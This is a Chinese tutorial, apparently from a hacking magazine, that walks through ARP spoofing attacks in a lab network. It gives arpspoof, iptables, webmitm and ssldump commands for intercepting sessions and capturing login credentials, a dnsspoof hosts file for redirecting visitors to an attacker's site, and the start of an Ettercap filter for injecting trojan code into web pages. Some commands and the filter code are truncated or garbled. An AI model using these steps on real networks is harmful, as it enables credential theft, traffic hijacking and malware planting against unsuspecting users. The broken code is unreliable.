大家好,这次由我来给大家简单介绍下linux下的各种arp方法以及工具的使用。这次我们主要使用的是dsniff和Ettercap。关于他们的安装,网上内容很多,我就不介绍了,大家可以百度搜索。这里提醒大家注意下,需要根据本身系统的版本来找对应的安装程序 dsniff安装成功后,接下来就是实际的操作了。其中arp在win中最常见的就是目标网站信息的刺探,比如账号密码等,第二个就是内网的DNS欺骗,第三是挂马。我是通过虚拟机搭建的内网环境,本机用的是win7+apache+mysql,IP为192.168.10.233;虚拟机上,BT5的IP是192.168.10.100;还有台用来模拟访问的机器,为win2003,IP地址是192.168.10.120;网关地址为192.168.10.1。下面我会依次介绍这几种arp手法。
首先是目标信息的嗅探,在win中我们常用的是cain,而这次我们主要使用的是webmitm同时还要用arpspoof辅助。Webmitm可以用来劫持HTTP和HTTPS会话过程,捕获SSL的加密通信,但这次我们主要的目标还是HTTP方面。Dsniff中的arpspoof和win中的工具不同,他主要是持续不断的发送假的ARP相应给一台或者多台主机,但他本身不能进行进一步攻击。首先我们打开本机的路由转发功能:
echo \
接下来进行iptables规则的设置,其中包括在嗅探HTTPS时的设置了,这里一起介绍: iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT iptables -A FORWARD -j ACCEPT 跟着运行arpspoof,命令是:
arpspoof -i eth0 192.168.10.233 运行后,结果如图1。
可以看到,已经开始嗅探了。接着我们在新的终端中执行: webmitm -d
接下来我们会被要求填写一系列信息,这个不重要,基本填写“.”或者根据要求填写就行。这时候显示如图2。
说明已经开始监听。最后要做的就是把webmitm得到的信息输入到一个文本中,使用命令:
ssldump -n -d -k webmitm.crt | tee ssldump.log Ssldump.log就是输出的文件。
这时候,我们在233这台电脑上任意打开一个网站,都会发现BT5的终端中,数据迅速翻页,我们的http操作都会被记录,比如说我登陆黑客防线的网站,在登陆处输入账号echoeye,密码hellohack,在点击登陆。跟着我们将bt5中的ssldump.log复制到机器233上,方便查看,用notepad++打开,直接搜索echoeye,显示如图3。
我不过这里的密码已经被加密,在提交前就加密,应该是JS加密,这里就不研究啦。我们也可以搜索pass等关键字,迅速找到有效信息。
下面开始介绍arp中比较常见,但十分好使的一个攻击方式:DNS欺骗。DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。 说的通俗点,就是你访问A网站,但并没能访问到A网站的IP,而是直接转到了攻击者所设定好的IP。这次我们使用的工具是dnsspoof。它也是dsniff工具集中的一个。dnsspoof依赖2个三方库:libpcap , libnet。当dnsspoof嗅探到局域网内有DNS请求数据包,它会分析其内容,并用伪造的DNS响应包来回复请求者。我们直接开始说明使用方法。首先我们建立个文件,文件名为“dnsspoof.hosts”名字是可以自定义的,只要后面执行命令时修改对应的参数就行,我们将该文件和dnsspoof放到一个文
件夹下,修改dnsspoof.hosts的内容为: 192.168.10.233 www.http://www.china-audit.com/ 意思是,将www.http://www.china-audit.com/的IP指定到192.168.10.233也就是我们本机搭建的那个web上,我们可以改成自己搭建好的网站IP就行,然后保存。跟着在终端中执行: dnsspoof -i eth0 -f ./dnsspoof.hosts。
注意下,这里的dnsspoof.host就是你自己修改的文件的文件名和地址了。显示结果如图4。
这里的意思已经开始监听,端口是53,其中192.168.10.101也就是本机是排除在外的,剩下的整个局域网都是被嗅探的范围。我再用机器120通过它访问百度,结果如图5。
显示的直接是我们233这台搭建的网站。这样就说明DNS欺骗成功了。可能有人会说,嗅探整个局域网范围太大,那么我们能不能指定一台机器呢?当然可以,命令是: dnsspoof -i eth0 -f ./dnsspoof.hosts src 192.168.10.120
这时显示:dnsspoof: listening on eth0 [src 192.168.10.120],说明这是针对120机器的DNS欺骗了,在第一次的命令中,如果我们在机器233上访问百度,也是会被转向的,但现在已经可以正常访问了,限于篇幅,我就不在重复了,这个大家可以自己去实验。 跟着介绍的就是挂马了,不过我不提倡挂马,这种方法危险度很高。这里只是做个介绍,大家了解下也能更容易防范。
这次我们用到的工具是ettercap。Ettercap 是中间人攻击的一整套工具,他可以自己编写过滤规则,这次我用的就是这个功能,首先我们写一个自己的过滤脚本。这里我给出 Mickey的以及网上的,两种都可以大家自己选择。
Mickey:
if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data,”Accept-Encoding”)) { replace(“Accept-Encoding”,”Accept-Mousecat”); msg(“zapped Accept-Encoding!\\n”); } }
if (ip.proto == TCP && tcp.src == 80) {
replace(“
” “); replace(“”,” ” “); msg(“Filter Ran.\\n”); }